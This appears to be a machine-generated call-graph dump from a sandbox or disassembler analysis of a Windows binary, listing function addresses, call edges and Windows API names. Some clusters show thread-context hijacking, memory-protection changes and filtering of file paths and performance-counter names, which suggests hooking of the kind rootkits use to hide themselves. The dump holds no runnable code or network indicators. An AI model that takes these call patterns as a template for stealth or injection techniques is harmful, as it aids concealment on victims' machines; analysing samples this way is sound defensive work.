22123c31c11 17587->17588 17592 22123c31c4c 17587->17592 17589 22123c31c44 17588->17589 17590 22123c31c32 DeleteCriticalSection 17588->17590 17591 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17589->17591 17590->17589 17590->17590 17591->17592 17592->17584 15696 22123c225dc 15697 22123c2265a 15696->15697 15698 22123c226bf GetFileType 15697->15698 15705 22123c22777 15697->15705 15699 22123c226e1 15698->15699 15700 22123c226cd StrCpyW 15698->15700 15707 22123c21ad4 GetFinalPathNameByHandleW 15699->15707 15702 22123c226ee 15700->15702 15702->15705 15712 22123c23f88 15702->15712 15715 22123c23708 StrCmpIW 15702->15715 15719 22123c21dd4 15702->15719 15708 22123c21b3d 15707->15708 15709 22123c21afe StrCmpNIW 15707->15709 15708->15702 15709->15708 15710 22123c21b18 lstrlenW 15709->15710 15710->15708 15711 22123c21b2a StrCpyW 15710->15711 15711->15708 15713 22123c23f95 StrCmpNIW 15712->15713 15714 22123c23faa 15712->15714 15713->15714 15714->15702 15716 22123c23751 PathCombineW 15715->15716 15717 22123c2373a StrCpyW StrCatW 15715->15717 15718 22123c2375a 15716->15718 15717->15718 15718->15702 15720 22123c21deb 15719->15720 15721 22123c21df4 15719->15721 15723 22123c21530 15720->15723 15721->15702 15726 22123c21580 15723->15726 15727 22123c2154a 15723->15727 15724 22123c21561 StrCmpIW 15724->15727 15725 22123c21569 StrCmpW 15725->15727 15726->15721 15727->15724 15727->15725 15727->15726 17599 22123c306e0 17600 22123c306e9 17599->17600 17604 22123c306f9 17599->17604 17601 22123c2d1f4 __std_exception_copy 13 API calls 17600->17601 17602 22123c306ee 17601->17602 17603 22123c2d04c _invalid_parameter_noinfo 38 API calls 17602->17603 17603->17604 15728 22123c525dc 15730 22123c5265a 15728->15730 15729 22123c52777 15730->15729 15731 22123c526bf GetFileType 15730->15731 15732 22123c526e1 15731->15732 15733 22123c526cd StrCpyW 15731->15733 15739 22123c51ad4 GetFinalPathNameByHandleW 15732->15739 15737 22123c526ee 15733->15737 15737->15729 15744 22123c53f88 15737->15744 15747 22123c53708 StrCmpIW 15737->15747 15751 22123c51dd4 15737->15751 15740 22123c51afe StrCmpNIW 15739->15740 15741 22123c51b3d 15739->15741 15740->15741 15742 22123c51b18 lstrlenW 15740->15742 15741->15737 15742->15741 15743 22123c51b2a StrCpyW 15742->15743 15743->15741 15745 22123c53f95 StrCmpNIW 15744->15745 15746 22123c53faa 15744->15746 15745->15746 15746->15737 15748 22123c53751 PathCombineW 15747->15748 15749 22123c5373a StrCpyW StrCatW 15747->15749 15750 22123c5375a 15748->15750 15749->15750 15750->15737 15752 22123c51df4 15751->15752 15753 22123c51deb 15751->15753 15752->15737 15754 22123c51530 2 API calls 15753->15754 15754->15752 17155 22123c263e3 17156 22123c263f0 17155->17156 17157 22123c263fc GetThreadContext 17156->17157 17160 22123c2655a 17156->17160 17158 22123c26422 17157->17158 17157->17160 17158->17160 17161 22123c26449 17158->17161 17159 22123c26581 VirtualProtect FlushInstructionCache 17159->17160 17160->17159 17162 22123c2663e 17160->17162 17166 22123c264cd 17161->17166 17167 22123c264a6 SetThreadContext 17161->17167 17163 22123c2665e 17162->17163 17165 22123c24b20 VirtualFree 17162->17165 17164 22123c25530 3 API calls 17163->17164 17170 22123c26663 17164->17170 17165->17163 17167->17166 17168 22123c266b7 17171 22123c28070 _invalid_parameter_noinfo 8 API calls 17168->17171 17169 22123c26677 ResumeThread 17169->17170 17170->17168 17170->17169 17172 22123c266ff 17171->17172 17173 22123c2f3e4 17174 22123c2f41d 17173->17174 17176 22123c2f3ee 17173->17176 17175 22123c2f403 FreeLibrary 17175->17176 17176->17174 17176->17175 17177 22123c333e4 17178 22123c333f5 CloseHandle 17177->17178 17179 22123c333fb 17177->17179 17178->17179 17196 22123c227e8 17198 22123c22867 17196->17198 17197 22123c22998 17198->17197 17199 22123c228c9 GetFileType 17198->17199 17200 22123c228d7 StrCpyW 17199->17200 17201 22123c228ed 17199->17201 17202 22123c228fc 17200->17202 17203 22123c21ad4 4 API calls 17201->17203 17206 22123c2299d 17202->17206 17208 22123c22906 17202->17208 17203->17202 17204 22123c23f88 StrCmpNIW 17204->17206 17205 22123c23f88 StrCmpNIW 17205->17208 17206->17197 17206->17204 17207 22123c23708 4 API calls 17206->17207 17209 22123c21dd4 2 API calls 17206->17209 17207->17206 17208->17197 17208->17205 17210 22123c23708 4 API calls 17208->17210 17211 22123c21dd4 2 API calls 17208->17211 17209->17206 17210->17208 17211->17208 16627 22123c2acec 16630 22123c290c0 16627->16630 16629 22123c2ad15 16631 22123c29116 16630->16631 16632 22123c290e1 16630->16632 16631->16629 16632->16631 16633 22123c2c328 __std_exception_copy 38 API calls 16632->16633 16633->16631 17250 22123c2b7ea 17251 22123c2c2f4 14 API calls 17250->17251 17252 22123c2b7ef 17251->17252 17253 22123c2b815 GetModuleHandleW 17252->17253 17254 22123c2b85f 17252->17254 17253->17254 17258 22123c2b822 17253->17258 17267 22123c2b6f8 17254->17267 17258->17254 17262 22123c2b904 GetModuleHandleExW 17258->17262 17263 22123c2b938 GetProcAddress 17262->17263 17264 22123c2b94a 17262->17264 17263->17264 17265 22123c2b962 17264->17265 17266 22123c2b95b FreeLibrary 17264->17266 17265->17254 17266->17265 17279 22123c2c558 EnterCriticalSection 17267->17279 17310 22123c22ff0 17311 22123c23061 17310->17311 17312 22123c23384 17311->17312 17313 22123c2308d GetModuleHandleA 17311->17313 17314 22123c2309f GetProcAddress 17313->17314 17315 22123c230b1 17313->17315 17314->17315 17315->17312 17316 22123c230d8 StrCmpNIW 17315->17316 17316->17312 17322 22123c230fd 17316->17322 17317 22123c21a30 6 API calls 17317->17322 17318 22123c2320f lstrlenW 17318->17322 17319 22123c232b9 lstrlenW 17319->17322 17320 22123c21cfc StrCmpIW StrCmpW 17320->17322 17321 22123c23f88 StrCmpNIW 17321->17322 17322->17312 17322->17317 17322->17318 17322->17319 17322->17320 17322->17321 17624 22123c346f5 17625 22123c29324 _CreateFrameInfo 9 API calls 17624->17625 17626 22123c3470d 17625->17626 17627 22123c29324 _CreateFrameInfo 9 API calls 17626->17627 17628 22123c34728 17627->17628 17629 22123c29324 _CreateFrameInfo 9 API calls 17628->17629 17630 22123c3473c 17629->17630 17631 22123c29324 _CreateFrameInfo 9 API calls 17630->17631 17632 22123c3477e 17631->17632 17323 22123c2cbfc 17328 22123c2f3a0 17323->17328 17325 22123c2cc05 17326 22123c2cb10 __std_exception_copy 13 API calls 17325->17326 17327 22123c2cc22 __vcrt_uninitialize_ptd 17325->17327 17326->17327 17329 22123c2f3b1 17328->17329 17330 22123c2f3b5 17328->17330 17329->17325 17330->17329 17331 22123c2ef88 9 API calls 17330->17331 17331->17329 15755 22123c241f9 15758 22123c24146 15755->15758 15756 22123c241b0 15757 22123c24196 VirtualQuery 15757->15756 15757->15758 15758->15756 15758->15757 15759 22123c241ca VirtualAlloc 15758->15759 15759->15756 15760 22123c241fb GetLastError 15759->15760 15760->15758 17332 22123c25ff9 17333 22123c26000 VirtualProtect 17332->17333 17334 22123c26029 GetLastError 17333->17334 17335 22123c25f10 17333->17335 17334->17335 16647 22123c2b500 16652 22123c2c558 EnterCriticalSection 16647->16652 17656 22123c22300 17657 22123c22331 17656->17657 17658 22123c22412 17657->17658 17659 22123c22447 17657->17659 17665 22123c22355 17657->17665 17660 22123c224bb 17659->17660 17661 22123c2244c 17659->17661 17660->17658 17664 22123c235c8 11 API calls 17660->17664 17673 22123c235c8 GetProcessHeap HeapAlloc 17661->17673 17663 22123c2238d StrCmpNIW 17663->17665 17664->17658 17665->17658 17665->17663 17667 22123c21d30 17665->17667 17668 22123c21db4 17667->17668 17669 22123c21d57 GetProcessHeap HeapAlloc 17667->17669 17668->17665 17669->17668 17670 22123c21d92 17669->17670 17671 22123c21cfc 2 API calls 17670->17671 17672 22123c21d9a GetProcessHeap HeapFree 17671->17672 17672->17668 17678 22123c2361b 17673->17678 17674 22123c236d9 GetProcessHeap HeapFree 17674->17658 17675 22123c236d4 17675->17674 17676 22123c23666 StrCmpNIW 17676->17678 17677 22123c21d30 6 API calls 17677->17678 17678->17674 17678->17675 17678->17676 17678->17677 16659 22123c25c8d 16661 22123c25c94 16659->16661 16660 22123c25cfb 16661->16660 16662 22123c25d77 VirtualProtect 16661->16662 16663 22123c25da3 GetLastError 16662->16663 16664 22123c25db1 16662->16664 16663->16664 17358 22123c31398 17359 22123c313ae 17358->17359 17360 22123c313f5 17359->17360 17361 22123c3140e 17359->17361 17362 22123c2d1f4 __std_exception_copy 13 API calls 17360->17362 17365 22123c2dd78 14 API calls 17361->17365 17366 22123c31405 17361->17366 17363 22123c313fa 17362->17363 17364 22123c2d04c _invalid_parameter_noinfo 38 API calls 17363->17364 17364->17366 17365->17366 15051 22123c2f6a0 15062 22123c2c558 EnterCriticalSection 15051->15062 15053 22123c2f6b0 15054 22123c31c5c 39 API calls 15053->15054 15055 22123c2f6b9 15054->15055 15056 22123c2f498 41 API calls 15055->15056 15061 22123c2f6c7 15055->15061 15058 22123c2f6c2 15056->15058 15057 22123c2c5ac Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 15059 22123c2f6d3 15057->15059 15060 22123c2f598 GetStdHandle GetFileType 15058->15060 15060->15061 15061->15057 17374 22123c3479d 17377 22123c2af34 17374->17377 17378 22123c2af9b 17377->17378 17379 22123c2af4e 17377->17379 17379->17378 17380 22123c29324 _CreateFrameInfo 9 API calls 17379->17380 17380->17378 17394 22123c30fa8 17395 22123c30fcc 17394->17395 17396 22123c28070 _invalid_parameter_noinfo 8 API calls 17395->17396 17397 22123c3100e 17396->17397 17398 22123c233a8 17399 22123c233cf 17398->17399 17400 22123c2349c 17399->17400 17401 22123c233ec PdhGetCounterInfoW 17399->17401 17401->17400 17402 22123c2340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 17401->17402 17403 22123c23488 GetProcessHeap HeapFree 17402->17403 17404 22123c23440 StrCmpW 17402->17404 17403->17400 17404->17403 17406 22123c23455 17404->17406 17405 22123c23950 12 API calls 17405->17406 17406->17403 17406->17405 17701 22123c2aaac 17702 22123c2aad9 __except_validate_context_record 17701->17702 17703 22123c29324 _CreateFrameInfo 9 API calls 17702->17703 17704 22123c2aade 17703->17704 17705 22123c2ab38 17704->17705 17706 22123c2abc6 17704->17706 17716 22123c2ab8c 17704->17716 17707 22123c2abb3 17705->17707 17715 22123c2ab5a __GetCurrentState 17705->17715 17705->17716 17711 22123c2abe5 17706->17711 17737 22123c299cc 17706->17737 17730 22123c295d0 17707->17730 17714 22123c2ac34 17711->17714 17711->17716 17740 22123c299e0 17711->17740 17712 22123c2acdd 17714->17716 17743 22123c2a22c 17714->17743 17715->17712 17718 22123c2afb8 17715->17718 17719 22123c299cc Is_bad_exception_allowed 9 API calls 17718->17719 17720 22123c2afe7 __GetCurrentState 17719->17720 17721 22123c29324 _CreateFrameInfo 9 API calls 17720->17721 17725 22123c2b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 17721->17725 17722 22123c2b0fb 17723 22123c29324 _CreateFrameInfo 9 API calls 17722->17723 17724 22123c2b100 17723->17724 17726 22123c29324 _CreateFrameInfo 9 API calls 17724->17726 17728 22123c2b10b __FrameHandler3::GetHandlerSearchState 17724->17728 17725->17722 17727 22123c299cc 9 API calls Is_bad_exception_allowed 17725->17727 17725->17728 17729 22123c299f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 17725->17729 17726->17728 17727->17725 17728->17716 17729->17725 17800 22123c29634 17730->17800 17732 22123c295ef __FrameHandler3::GetHandlerSearchState 17804 22123c29540 17732->17804 17735 22123c2afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 17736 22123c29624 17735->17736 17736->17716 17738 22123c29324 _CreateFrameInfo 9 API calls 17737->17738 17739 22123c299d5 17738->17739 17739->17711 17741 22123c29324 _CreateFrameInfo 9 API calls 17740->17741 17742 22123c299e9 17741->17742 17742->17714 17808 22123c2b144 17743->17808 17745 22123c2a6f4 17746 22123c2a645 17746->17745 17786 22123c2a643 17746->17786 17861 22123c2a6fc 17746->17861 17747 22123c2a373 17747->17746 17773 22123c2a3ab 17747->17773 17749 22123c29324 _CreateFrameInfo 9 API calls 17753 22123c2a687 17749->17753 17750 22123c2a575 17756 22123c2a592 17750->17756 17758 22123c299cc Is_bad_exception_allowed 9 API calls 17750->17758 17750->17786 17751 22123c29324 _CreateFrameInfo 9 API calls 17754 22123c2a2da 17751->17754 17753->17745 17755 22123c28070 _invalid_parameter_noinfo 8 API calls 17753->17755 17754->17753 17759 22123c29324 _CreateFrameInfo 9 API calls 17754->17759 17757 22123c2a69a 17755->17757 17762 22123c2a5b4 17756->17762 17756->17786 17854 22123c295a4 17756->17854 17757->17716 17758->17756 17761 22123c2a2ea 17759->17761 17763 22123c29324 _CreateFrameInfo 9 API calls 17761->17763 17764 22123c2a5ca 17762->17764 17762->17786 17797 22123c2a6d7 17762->17797 17765 22123c2a2f3 17763->17765 17766 22123c2a5d5 17764->17766 17769 22123c299cc Is_bad_exception_allowed 9 API calls 17764->17769 17819 22123c29a0c 17765->17819 17772 22123c2b1dc 9 API calls 17766->17772 17767 22123c29324 _CreateFrameInfo 9 API calls 17771 22123c2a6dd 17767->17771 17769->17766 17770 22123c299e0 9 API calls 17770->17773 17774 22123c29324 _CreateFrameInfo 9 API calls 17771->17774 17779 22123c2a5eb 17772->17779 17773->17750 17773->17770 17833 22123c2a96c 17773->17833 17847 22123c2a158 17773->17847 17775 22123c2a6e6 17774->17775 17777 22123c2c2f4 14 API calls 17775->17777 17776 22123c29324 _CreateFrameInfo 9 API calls 17780 22123c2a335 17776->17780 17777->17745 17781 22123c29634 __SetUnwindTryBlock RtlLookupFunctionEntry 17779->17781 17779->17786 17780->17747 17783 22123c29324 _CreateFrameInfo 9 API calls 17780->17783 17782 22123c2a605 17781->17782 17858 22123c29838 RtlUnwindEx 17782->17858 17785 22123c2a341 17783->17785 17787 22123c29324 _CreateFrameInfo 9 API calls 17785->17787 17786->17749 17789 22123c2a34a 17787->17789 17822 22123c2b1dc 17789->17822 17793 22123c2a35e 17829 22123c2b2cc 17793->17829 17795 22123c2a6d1 17796 22123c2c2f4 14 API calls 17795->17796 17796->17797 17797->17767 17798 22123c2a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 17798->17795 17799 22123c29178 Concurrency::cancel_current_task 2 API calls 17798->17799 17799->17795 17803 22123c29662 __FrameHandler3::GetHandlerSearchState 17800->17803 17801 22123c296d4 17801->17732 17802 22123c2968c RtlLookupFunctionEntry 17802->17803 17803->17801 17803->17802 17805 22123c2958b 17804->17805 17806 22123c29560 17804->17806 17805->17735 17806->17805 17807 22123c29324 _CreateFrameInfo 9 API calls 17806->17807 17807->17806 17809 22123c2b169 __FrameHandler3::GetHandlerSearchState 17808->17809 17810 22123c29634 __SetUnwindTryBlock RtlLookupFunctionEntry 17809->17810 17811 22123c2b17e 17810->17811 17873 22123c29db4 17811->17873 17814 22123c2b1b3 17816 22123c29db4 __GetUnwindTryBlock RtlLookupFunctionEntry 17814->17816 17815 22123c2b190 __FrameHandler3::GetHandlerSearchState 17876 22123c29dec 17815->17876 17817 22123c2a28e 17816->17817 17817->17745 17817->17747 17817->17751 17820 22123c29324 _CreateFrameInfo 9 API calls 17819->17820 17821 22123c29a1a 17820->17821 17821->17745 17821->17776 17823 22123c2b2c3 17822->17823 17826 22123c2b207 17822->17826 17824 22123c2a35a 17824->17747 17824->17793 17825 22123c299e0 9 API calls 17825->17826 17826->17824 17826->17825 17827 22123c299cc Is_bad_exception_allowed 9 API calls 17826->17827 17828 22123c2a96c 9 API calls 17826->17828 17827->17826 17828->17826 17830 22123c2b2e9 Is_bad_exception_allowed 17829->17830 17832 22123c2b339 17829->17832 17831 22123c299cc 9 API calls Is_bad_exception_allowed 17830->17831 17830->17832 17831->17830 17832->17798 17834 22123c2a999 17833->17834 17845 22123c2aa28 17833->17845 17835 22123c299cc Is_bad_exception_allowed 9 API calls 17834->17835 17836 22123c2a9a2 17835->17836 17837 22123c299cc Is_bad_exception_allowed 9 API calls 17836->17837 17838 22123c2a9bb 17836->17838 17836->17845 17837->17838 17839 22123c2a9e7 17838->17839 17840 22123c299cc Is_bad_exception_allowed 9 API calls 17838->17840 17838->17845 17841 22123c299e0 9 API calls 17839->17841 17840->17839 17842 22123c2a9fb 17841->17842 17843 22123c2aa14 17842->17843 17844 22123c299cc Is_bad_exception_allowed 9 API calls 17842->17844 17842->17845 17846 22123c299e0 9 API calls 17843->17846 17844->17843 17845->17773 17846->17845 17848 22123c29634 __SetUnwindTryBlock RtlLookupFunctionEntry 17847->17848 17849 22123c2a195 17848->17849 17850 22123c299cc Is_bad_exception_allowed 9 API calls 17849->17850 17851 22123c2a1cd 17850->17851 17852 22123c29838 9 API calls 17851->17852 17853 22123c2a211 17852->17853 17853->17773 17855 22123c295b8 __FrameHandler3::GetHandlerSearchState 17854->17855 17856 22123c29540 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 17855->17856 17857 22123c295c2 17856->17857 17857->17762 17859 22123c28070 _invalid_parameter_noinfo 8 API calls 17858->17859 17860 22123c29932 17859->17860 17860->17786 17862 22123c2a735 17861->17862 17867 22123c2a948 17861->17867 17863 22123c29324 _CreateFrameInfo 9 API calls 17862->17863 17864 22123c2a73a 17863->17864 17865 22123c2a759 EncodePointer 17864->17865 17871 22123c2a7ac 17864->17871 17866 22123c29324 _CreateFrameInfo 9 API calls 17865->17866 17868 22123c2a769 17866->17868 17867->17786 17868->17871 17879 22123c294ec 17868->17879 17870 22123c299cc 9 API calls Is_bad_exception_allowed 17870->17871 17871->17867 17871->17870 17872 22123c2a158 19 API calls 17871->17872 17872->17871 17874 22123c29634 __SetUnwindTryBlock RtlLookupFunctionEntry 17873->17874 17875 22123c29dc7 17874->17875 17875->17814 17875->17815 17877 22123c29634 __SetUnwindTryBlock RtlLookupFunctionEntry 17876->17877 17878 22123c29e06 17877->17878 17878->17817 17880 22123c29324 _CreateFrameInfo 9 API calls 17879->17880 17881 22123c29518 17880->17881 17881->17871 18063 22123c22ab4 TlsGetValue TlsGetValue TlsGetValue 18064 22123c22b79 18063->18064 18065 22123c22b0d 18063->18065 18067 22123c22b74 18064->18067 18068 22123c22c32 TlsSetValue TlsSetValue TlsSetValue 18064->18068 18070 22123c23f88 StrCmpNIW 18064->18070 18065->18064 18066 22123c22b15 18065->18066 18066->18067 18066->18068 18069 22123c23f88 StrCmpNIW 18066->18069 18068->18067 18069->18066 18070->18064 16694 22123c234b8 16695 22123c234e8 16694->16695 16696 22123c235a1 16695->16696 16697 22123c23505 PdhGetCounterInfoW 16695->16697 16697->16696 16698 22123c23523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 16697->16698 16699 22123c23555 StrCmpW 16698->16699 16700 22123c2358d GetProcessHeap HeapFree 16698->16700 16699->16700 16702 22123c2356a 16699->16702 16700->16696 16702->16700 16703 22123c23950 StrCmpNW 16702->16703 16704 22123c239f2 16703->16704 16705 22123c23982 StrStrW 16703->16705 16704->16702 16705->16704 16706 22123c2399b StrToIntW 16705->16706 16706->16704 16707 22123c239c3 16706->16707 16707->16704 16713 22123c21a30 OpenProcess 16707->16713 16710 22123c23f88 StrCmpNIW 16711 22123c239e4 16710->16711 16711->16704 16719 22123c21cfc 16711->16719 16714 22123c21a64 K32GetModuleFileNameExW 16713->16714 16715 22123c21ab6 16713->16715 16716 22123c21aad CloseHandle 16714->16716 16717 22123c21a7e PathFindFileNameW lstrlenW 16714->16717 16715->16704 16715->16710 16716->16715 16717->16716 16718 22123c21a9c StrCpyW 16717->16718 16718->16716 16720 22123c21d13 16719->16720 16721 22123c21d1c 16719->16721 16722 22123c21530 2 API calls 16720->16722 16721->16704 16722->16721 15922 22123c281c0 15923 22123c281c9 __scrt_acquire_startup_lock 15922->15923 15924 22123c281cd 15923->15924 15926 22123c2bbb4 15923->15926 15927 22123c2bbd4 15926->15927 15954 22123c2bbed 15926->15954 15928 22123c2bbf2 15927->15928 15929 22123c2bbdc 15927->15929 15931 22123c2e864 56 API calls 15928->15931 15930 22123c2d1f4 __std_exception_copy 13 API calls 15929->15930 15932 22123c2bbe1 15930->15932 15933 22123c2bbf7 15931->15933 15955 22123c2d04c 15932->15955 15958 22123c2df38 GetModuleFileNameW 15933->15958 15941 22123c2bc69 15943 22123c2d1f4 __std_exception_copy 13 API calls 15941->15943 15942 22123c2bc7a 15944 22123c2b994 14 API calls 15942->15944 15953 22123c2bc6e 15943->15953 15945 22123c2bc96 15944->15945 15947 22123c2bcc6 15945->15947 15948 22123c2bcdf 15945->15948 15945->15953 15946 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15946->15954 15949 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15947->15949 15951 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15948->15951 15950 22123c2bccf 15949->15950 15952 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15950->15952 15951->15953 15952->15954 15953->15946 15954->15924 15982 22123c2cef8 15955->15982 15959 22123c2df91 15958->15959 15960 22123c2df7d GetLastError 15958->15960 15961 22123c2dd78 14 API calls 15959->15961 16047 22123c2d184 15960->16047 15963 22123c2dfbf 15961->15963 15969 22123c2dfd0 15963->15969 16052 22123c2f198 15963->16052 15964 22123c2df8a 15965 22123c28070 _invalid_parameter_noinfo 8 API calls 15964->15965 15967 22123c2bc0e 15965->15967 15970 22123c2b994 15967->15970 16056 22123c2de1c 15969->16056 15972 22123c2b9d2 15970->15972 15974 22123c2ba38 15972->15974 16073 22123c2ec1c 15972->16073 15973 22123c2bb25 15976 22123c2bb54 15973->15976 15974->15973 15975 22123c2ec1c 14 API calls 15974->15975 15975->15974 15977 22123c2bb6c 15976->15977 15978 22123c2bba4 15976->15978 15977->15978 15979 22123c2d220 __std_exception_copy 13 API calls 15977->15979 15978->15941 15978->15942 15980 22123c2bb9a 15979->15980 15981 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15980->15981 15981->15978 15983 22123c2cf23 15982->15983 15990 22123c2cf94 15983->15990 15985 22123c2cf4a 15987 22123c2cf6d 15985->15987 16000 22123c2c3e0 15985->16000 15988 22123c2cf82 15987->15988 15989 22123c2c3e0 _invalid_parameter_noinfo 17 API calls 15987->15989 15988->15954 15989->15988 16013 22123c2ccc8 15990->16013 15996 22123c2cfcf 15996->15985 16001 22123c2c438 16000->16001 16002 22123c2c3ef GetLastError 16000->16002 16001->15987 16003 22123c2c404 16002->16003 16004 22123c2cba0 _invalid_parameter_noinfo 14 API calls 16003->16004 16005 22123c2c41e SetLastError 16004->16005 16005->16001 16006 22123c2c441 16005->16006 16007 22123c2c3e0 _invalid_parameter_noinfo 15 API calls 16006->16007 16008 22123c2c467 16007->16008 16039 22123c2ffe8 16008->16039 16014 22123c2cce4 GetLastError 16013->16014 16015 22123c2cd1f 16013->16015 16016 22123c2ccf4 16014->16016 16015->15996 16019 22123c2cd34 16015->16019 16026 22123c2cba0 16016->16026 16020 22123c2cd50 GetLastError SetLastError 16019->16020 16021 22123c2cd68 16019->16021 16020->16021 16021->15996 16022 22123c2d06c IsProcessorFeaturePresent 16021->16022 16023 22123c2d07f 16022->16023 16031 22123c2cd80 16023->16031 16027 22123c2cbc4 16026->16027 16028 22123c2cbc8 FlsGetValue 16026->16028 16029 22123c2cbde SetLastError 16027->16029 16030 22123c2c940 __std_exception_copy 13 API calls 16027->16030 16028->16027 16029->16015 16030->16029 16032 22123c2cdba _invalid_parameter_noinfo 16031->16032 16033 22123c2cde2 RtlCaptureContext RtlLookupFunctionEntry 16032->16033 16034 22123c2ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16033->16034 16035 22123c2ce2e RtlVirtualUnwind 16033->16035 16036 22123c2ceb6 _invalid_parameter_noinfo 16034->16036 16035->16034 16037 22123c28070 _invalid_parameter_noinfo 8 API calls 16036->16037 16038 22123c2ced5 GetCurrentProcess TerminateProcess 16037->16038 16040 22123c30001 16039->16040 16041 22123c2c48f 16039->16041 16040->16041 16042 22123c30a40 _invalid_parameter_noinfo 14 API calls 16040->16042 16043 22123c30054 16041->16043 16042->16041 16044 22123c2c49f 16043->16044 16045 22123c3006d 16043->16045 16044->15987 16045->16044 16046 22123c2e8c4 _invalid_parameter_noinfo 14 API calls 16045->16046 16046->16044 16070 22123c2d1d0 16047->16070 16049 22123c2d191 Concurrency::details::SchedulerProxy::DeleteThis 16050 22123c2d1f4 __std_exception_copy 13 API calls 16049->16050 16051 22123c2d1a1 16050->16051 16051->15964 16053 22123c2f1ca 16052->16053 16054 22123c2f1a9 16052->16054 16053->15969 16054->16053 16055 22123c2ef88 9 API calls 16054->16055 16055->16053 16057 22123c2de5b 16056->16057 16058 22123c2de40 16056->16058 16059 22123c2ece8 WideCharToMultiByte 16057->16059 16060 22123c2de60 16057->16060 16058->15964 16061 22123c2deb7 16059->16061 16060->16058 16062 22123c2d1f4 __std_exception_copy 13 API calls 16060->16062 16061->16060 16063 22123c2debe GetLastError 16061->16063 16065 22123c2dee9 16061->16065 16062->16058 16064 22123c2d184 13 API calls 16063->16064 16067 22123c2decb 16064->16067 16066 22123c2ece8 WideCharToMultiByte 16065->16066 16068 22123c2df10 16066->16068 16069 22123c2d1f4 __std_exception_copy 13 API calls 16067->16069 16068->16058 16068->16063 16069->16058 16071 22123c2cb10 __std_exception_copy 13 API calls 16070->16071 16072 22123c2d1d9 16071->16072 16072->16049 16074 22123c2eba8 16073->16074 16075 22123c2dd78 14 API calls 16074->16075 16076 22123c2ebcc 16075->16076 16076->15972 18079 22123c2ae42 18080 22123c29324 _CreateFrameInfo 9 API calls 18079->18080 18082 22123c2ae4f __CxxCallCatchBlock 18080->18082 18081 22123c2ae93 RaiseException 18083 22123c2aeba 18081->18083 18082->18081 18084 22123c29978 __CxxCallCatchBlock 9 API calls 18083->18084 18087 22123c2aec2 18084->18087 18085 22123c29324 _CreateFrameInfo 9 API calls 18086 22123c2aefe 18085->18086 18088 22123c29324 _CreateFrameInfo 9 API calls 18086->18088 18089 22123c28ff8 __CxxCallCatchBlock 9 API calls 18087->18089 18091 22123c2aeeb __CxxCallCatchBlock 18087->18091 18090 22123c2af07 18088->18090 18089->18091 18091->18085 16742 22123c34848 16745 22123c2904c 16742->16745 16746 22123c29064 16745->16746 16747 22123c29076 16745->16747 16746->16747 16748 22123c2906c 16746->16748 16749 22123c29324 _CreateFrameInfo 9 API calls 16747->16749 16751 22123c29324 _CreateFrameInfo 9 API calls 16748->16751 16755 22123c29074 16748->16755 16750 22123c2907b 16749->16750 16753 22123c29324 _CreateFrameInfo 9 API calls 16750->16753 16750->16755 16752 22123c2909b 16751->16752 16754 22123c29324 _CreateFrameInfo 9 API calls 16752->16754 16753->16755 16756 22123c290a8 16754->16756 16757 22123c2c2f4 14 API calls 16756->16757 16758 22123c290b1 16757->16758 16759 22123c2c2f4 14 API calls 16758->16759 16760 22123c290bd 16759->16760 16146 22123c2ad48 16169 22123c29324 16146->16169 16148 22123c2ad7d 16149 22123c29324 _CreateFrameInfo 9 API calls 16148->16149 16150 22123c2ad8b __except_validate_context_record 16149->16150 16151 22123c29324 _CreateFrameInfo 9 API calls 16150->16151 16152 22123c2adcf 16151->16152 16153 22123c29324 _CreateFrameInfo 9 API calls 16152->16153 16154 22123c2add8 16153->16154 16155 22123c29324 _CreateFrameInfo 9 API calls 16154->16155 16156 22123c2ade1 16155->16156 16172 22123c2993c 16156->16172 16159 22123c2ae11 __CxxCallCatchBlock 16179 22123c29978 16159->16179 16160 22123c29324 _CreateFrameInfo 9 API calls 16160->16159 16162 22123c2aeeb __CxxCallCatchBlock 16163 22123c29324 _CreateFrameInfo 9 API calls 16162->16163 16164 22123c2aefe 16163->16164 16166 22123c29324 _CreateFrameInfo 9 API calls 16164->16166 16168 22123c2af07 16166->16168 16190 22123c29340 16169->16190 16171 22123c2932d 16171->16148 16173 22123c29324 _CreateFrameInfo 9 API calls 16172->16173 16174 22123c2994d 16173->16174 16175 22123c29958 16174->16175 16176 22123c29324 _CreateFrameInfo 9 API calls 16174->16176 16177 22123c29324 _CreateFrameInfo 9 API calls 16175->16177 16176->16175 16178 22123c29969 16177->16178 16178->16159 16178->16160 16180 22123c29324 _CreateFrameInfo 9 API calls 16179->16180 16181 22123c2998a 16180->16181 16182 22123c299c5 16181->16182 16183 22123c29324 _CreateFrameInfo 9 API calls 16181->16183 16184 22123c29995 16183->16184 16184->16182 16185 22123c29324 _CreateFrameInfo 9 API calls 16184->16185 16186 22123c299b6 16185->16186 16186->16162 16187 22123c28ff8 16186->16187 16188 22123c29324 _CreateFrameInfo 9 API calls 16187->16188 16189 22123c29006 16188->16189 16189->16162 16191 22123c29358 16190->16191 16192 22123c2935f GetLastError 16190->16192 16191->16171 16202 22123c29c8c 16192->16202 16206 22123c29aac 16202->16206 16212 22123c29b96 TlsGetValue 16206->16212 16213 22123c29af0 __vcrt_InitializeCriticalSectionEx 16206->16213 16207 22123c29b1e LoadLibraryExW 16209 22123c29b3f GetLastError 16207->16209 16210 22123c29bbd 16207->16210 16208 22123c29bdd GetProcAddress 16208->16212 16209->16213 16210->16208 16211 22123c29bd4 FreeLibrary 16210->16211 16211->16208 16213->16207 16213->16208 16213->16212 16214 22123c29b61 LoadLibraryExW 16213->16214 16214->16210 16214->16213 18105 22123c2824c 18106 22123c28270 __scrt_acquire_startup_lock 18105->18106 18107 22123c2b581 18106->18107 18108 22123c2cb10 __std_exception_copy 13 API calls 18106->18108 18109 22123c2b5aa 18108->18109 16220 